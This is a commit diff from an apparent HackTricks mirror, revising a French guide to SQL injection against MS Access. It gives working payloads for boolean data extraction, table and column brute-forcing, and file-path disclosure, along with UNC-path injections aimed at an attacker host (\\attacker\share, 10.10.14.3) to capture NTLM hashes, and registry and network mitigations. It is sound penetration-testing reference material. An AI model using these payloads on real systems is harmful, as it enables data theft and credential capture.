maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/sql-injection/ms-access-sql-injection.md

Browse Source
This commit is contained in:
Translator 2025-07-11 10:08:19 +00:00
parent 3886d997ee
commit 241b1bafa7
1 changed files with 59 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

75
src/pentesting-web/sql-injection/ms-access-sql-injection.md
View File

@ -4,7 +4,7 @@
## Terrain de jeu en ligne
- [https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format\&ss=-1](https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1)
- [https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1](https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1)
## Limitations de la base de données
@ -50,19 +50,19 @@ Par conséquent, vous devez connaître un **nom de table valide**.
> [!WARNING]
> Cela vous permettra d'exfiltrer des valeurs de la table actuelle sans avoir besoin de connaître le nom de la table.
**MS Access** permet une **syntaxe étrange** telle que **`'1'=2='3'='asd'=false`**. Comme d'habitude, l'injection SQL sera à l'intérieur d'une clause **`WHERE`**, nous pouvons en abuser.
**MS Access** permet une **syntaxe étrange** telle que **`'1'=2='3'='asd'=false`**. Comme d'habitude, l'injection SQL se trouvera dans une clause **`WHERE`**, nous pouvons en abuser.
Imaginez que vous ayez une SQLi dans une base de données MS Access et que vous sachiez (ou deviniez) qu'un **nom de colonne est username**, et c'est le champ que vous souhaitez **exfiltrer**. Vous pourriez vérifier les différentes réponses de l'application web lorsque la technique des égalités en chaîne est utilisée et potentiellement exfiltrer du contenu avec une **injection booléenne** en utilisant la fonction **`Mid`** pour obtenir des sous-chaînes.
```sql
'=(Mid(username,1,3)='adm')='
```
Si vous connaissez le **nom de la table** et la **colonne** à extraire, vous pouvez utiliser une combinaison de `Mid`, `LAST` et `TOP` pour **fuiter toutes les informations** via SQLi booléen :
Si vous connaissez le **nom de la table** et **la colonne** à extraire, vous pouvez utiliser une combinaison entre `Mid`, `LAST` et `TOP` pour **fuiter toutes les informations** via une injection SQL booléenne :
```sql
'=(Mid((select last(useranme) from (select top 1 username from usernames)),1,3)='Alf')='
```
_Feel free to check this in the online playground._
### Brute-forcing les noms de tables
### Brute-forcing Table names
En utilisant la technique de chaînage des égalités, vous pouvez également **bruteforcer les noms de tables** avec quelque chose comme :
```sql
@ -77,9 +77,9 @@ _Feel free to check this in the online playground._
- Noms de tables courants de Sqlmap : [https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt](https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt)
- Il y a une autre liste dans [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
### Brute-Forcing des noms de colonnes
### Brute-Forcing Noms de colonnes
Vous pouvez **brute-forcer les noms de colonnes actuels** avec le truc de chaînage des égalités avec :
Vous pouvez **brute-forcer les noms de colonnes actuels** avec le truc de chaînage d'égalités avec :
```sql
'=column_name='
```
@ -87,7 +87,7 @@ Ou avec un **group by** :
```sql
-1' GROUP BY column_name%00
```
Ou vous pouvez forcer par brute les noms de colonnes d'une **table différente** avec :
Ou vous pouvez forcer les noms de colonnes d'une **table différente** avec :
```sql
'=(SELECT TOP 1 column_name FROM valid_table_name)='
@ -95,15 +95,25 @@ Ou vous pouvez forcer par brute les noms de colonnes d'une **table différente**
```
### Dumping data
Nous avons déjà discuté de la [**technique de chaînage des égalités**](ms-access-sql-injection.md#chaining-equals-+-substring) **pour extraire des données des tables actuelles et d'autres tables**. Mais il existe d'autres méthodes :
Nous avons déjà discuté de la [**technique de chaînage d'égalités**](ms-access-sql-injection.md#chaining-equals-+-substring) **pour extraire des données des tables actuelles et d'autres tables**. Mais il existe d'autres méthodes :
```sql
IIF((select mid(last(username),1,1) from (select top 10 username from users))='a',0,'ko')
```
En résumé, la requête utilise une instruction "if-then" afin de déclencher un "200 OK" en cas de succès ou une "500 Internal Error" sinon. En tirant parti de l'opérateur TOP 10, il est possible de sélectionner les dix premiers résultats. L'utilisation subséquente de LAST permet de considérer uniquement le 10ème tuple. Sur cette valeur, en utilisant l'opérateur MID, il est possible d'effectuer une simple comparaison de caractères. En changeant correctement l'index de MID et TOP, nous pouvons extraire le contenu du champ "username" pour toutes les lignes.
### Basé sur le temps
### Astuces Basées sur le Temps (Aveugles)
Vérifiez [https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN](<https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN>)
Jet/ACE SQL lui-même **ne** expose **pas** de fonction native `SLEEP()` ou `WAITFOR`, donc les injections aveugles basées sur le temps sont limitées. Cependant, vous pouvez toujours introduire un délai mesurable en forçant le moteur à accéder à une **ressource réseau qui est lente ou ne répond pas**. Parce que le moteur essaiera d'ouvrir le fichier avant de retourner le résultat, le temps de réponse HTTP reflète la latence aller-retour vers l'hôte contrôlé par l'attaquant.
```sql
' UNION SELECT 1 FROM SomeTable IN '\\10.10.14.3\doesnotexist\dummy.mdb'--
```
Pointez le chemin UNC vers :
* un partage SMB derrière un lien à haute latence
* un hôte qui abandonne la poignée de main TCP après `SYN-ACK`
* un trou noir de pare-feu
Les secondes supplémentaires introduites par la recherche distante peuvent être utilisées comme un **oracle de timing hors bande** pour des conditions booléennes (par exemple, choisir un chemin lent uniquement lorsque le prédicat injecté est vrai). Microsoft documente le comportement de la base de données distante et le kill-switch associé dans KB5002984. citeturn1search0
### Autres fonctions intéressantes
@ -114,7 +124,7 @@ Vérifiez [https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc51267
- `IIF(1=1,'a','b')` si alors
- `COUNT(*)` Compter le nombre d'éléments
## Énumérer les tables
## Énumération des tables
Depuis [**ici**](https://dataedo.com/kb/query/access/list-of-tables-in-the-database), vous pouvez voir une requête pour obtenir les noms des tables :
```sql
@ -132,11 +142,11 @@ Cependant, notez qu'il est très typique de trouver des injections SQL où vous
### Chemin d'accès complet du répertoire racine web
La connaissance du **chemin absolu du répertoire racine web peut faciliter d'autres attaques**. Si les erreurs d'application ne sont pas complètement dissimulées, le chemin du répertoire peut être découvert en essayant de sélectionner des données à partir d'une base de données inexistante.
La connaissance du **chemin d'accès absolu du répertoire web peut faciliter d'autres attaques**. Si les erreurs d'application ne sont pas complètement dissimulées, le chemin du répertoire peut être découvert en essayant de sélectionner des données à partir d'une base de données inexistante.
`http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00`
`http://localhost/script.asp?id=1'+ '+UNION+SELECT+1+FROM+FakeDB.FakeTable%00`
MS Access répond avec un **message d'erreur contenant le chemin complet du répertoire web**.
MS Access répond avec un **message d'erreur contenant le chemin d'accès complet du répertoire web**.
### Énumération de fichiers
@ -154,14 +164,47 @@ Le **nom de fichier de base de données (.mdb)** peut être inféré avec la req
`http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00`
**name\[i] est un nom de fichier .mdb** et **realTable est une table existante** dans la base de données. Bien que MS Access déclenche toujours un message d'erreur, il est possible de distinguer entre un nom de fichier invalide et un nom de fichier .mdb valide.
**name[i] est un nom de fichier .mdb** et **realTable est une table existante** dans la base de données. Bien que MS Access déclenche toujours un message d'erreur, il est possible de distinguer entre un nom de fichier invalide et un nom de fichier .mdb valide.
### Cracker le mot de passe .mdb
### Accès à la base de données distante et vol d'identifiants NTLM (2023)
Depuis Jet 4.0, chaque requête peut référencer une table située dans un fichier `.mdb/.accdb` *différent* via la clause `IN '<path>'` :
```sql
SELECT first_name FROM Employees IN '\\server\share\hr.accdb';
```
Si l'entrée de l'utilisateur est concaténée dans la partie après **IN** (ou dans un appel `JOIN … IN` / `OPENROWSET` / `OPENDATASOURCE`), un attaquant peut spécifier un **chemin UNC** qui pointe vers un hôte qu'il contrôle. Le moteur va :
1. essayer de s'authentifier via SMB / HTTP pour ouvrir la base de données distante ;
2. leak les **identifiants NTLM** du serveur web (authentification forcée) ;
3. analyser le fichier distant une base de données malformée ou malveillante peut déclencher des bogues de corruption de mémoire Jet/ACE qui ont été corrigés plusieurs fois (par exemple, CVE-2021-28455).
Exemple pratique d'injection :
```sql
1' UNION SELECT TOP 1 name
FROM MSysObjects
IN '\\attacker\share\poc.mdb'-- -
```
Impact :
* Exfiltration hors bande des hachages Net-NTLMv2 (utilisables pour le relais ou le craquage hors ligne).
* Exécution de code à distance potentielle si un nouveau bug du parseur Jet/ACE est exploité.
Atténuations (recommandées même pour les applications Classic ASP héritées) :
* Ajoutez la valeur de registre `AllowQueryRemoteTables = 0` sous `HKLM\Software\Microsoft\Jet\4.0\Engines` (et sous le chemin ACE équivalent). Cela force Jet/ACE à rejeter les chemins distants commençant par `\\`.
* Bloquez le SMB/WebDAV sortant à la frontière du réseau.
* Assainissez / paramétrez toute partie d'une requête qui pourrait se retrouver dans une clause `IN`.
Le vecteur d'authentification forcée a été réexaminé par Check Point Research en 2023, prouvant qu'il est toujours exploitable sur Windows Server entièrement patché lorsque la clé de registre est absente. citeturn0search0
### .mdb Cracker de mot de passe
[**Access PassView**](https://www.nirsoft.net/utils/accesspv.html) est un utilitaire gratuit qui peut être utilisé pour récupérer le mot de passe principal de la base de données de Microsoft Access 95/97/2000/XP ou Jet Database Engine 3.0/4.0.
## Références
- [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
- [Microsoft KB5002984 Configurer Jet/ACE pour bloquer les tables distantes](https://support.microsoft.com/en-gb/topic/kb5002984-configuring-jet-red-database-engine-and-access-connectivity-engine-to-block-access-to-remote-databases-56406821-30f3-475c-a492-208b9bd30544)
- [Check Point Research Abuser des tables liées de Microsoft Access pour l'authentification forcée NTLM (2023)](https://research.checkpoint.com/2023/abusing-microsoft-access-linked-table-feature-to-perform-ntlm-forced-authentication-attacks/)
{{#include ../../banners/hacktricks-training.md}}